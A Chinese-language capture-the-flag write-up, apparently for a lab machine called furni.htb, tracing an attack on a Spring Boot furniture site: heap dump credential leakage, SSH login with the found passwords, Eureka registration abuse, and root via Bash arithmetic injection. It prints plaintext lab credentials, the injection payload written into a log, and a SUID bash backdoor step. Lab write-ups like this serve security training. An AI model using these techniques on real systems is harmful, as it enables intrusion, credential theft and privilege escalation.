Nmap扫描发现三个开放端口:
家具商店网站,技术栈为Spring Boot框架。通过feroxbuster目录扫描发现暴露的Actuator端点,特别是/actuator/heapdump
堆转储端点。
下载堆转储文件并使用多种工具分析:
发现关键凭证:
jdbc:mysql://localhost:3306/Furni_WebApp_DB§{password=0sc@r190_S0l!dP@sswd, user=oscar190}
http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/
使用发现的凭证成功SSH登录:
ssh oscar190@furni.htb
密码:0sc@r190_S0l!dP@sswd
发现多个Spring Boot应用:
利用Eureka服务注册机制:
捕获到凭证:IL!veT0Be&BeT0L0ve
ssh miranda-wise@furni.htb
密码:IL!veT0Be&BeT0L0ve
发现定时任务执行的/opt/log_analyse.sh
脚本存在Bash算术注入漏洞:
analyze_http_statuses() {
while IFS= read -r line; do
code=$(echo "$line" | grep -oP 'Status: \K.*')
# 漏洞:code变量直接用于算术比较
if [[ "$existing_code" -eq "$code" ]]; then
# ...
fi
done
}
利用Bash算术表达式注入:
echo 'HTTP Status: x[$(cp /bin/bash /tmp/0xdf; chmod 6777 /tmp/0xdf)]' > application.log
创建SUID bash后门并获取root shell:
/tmp/0xdf -p
本渗透测试展示了Spring Boot应用安全配置不当导致的完整攻击链:从堆转储信息泄露到服务注册劫持,最终通过脚本漏洞实现权限提升。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。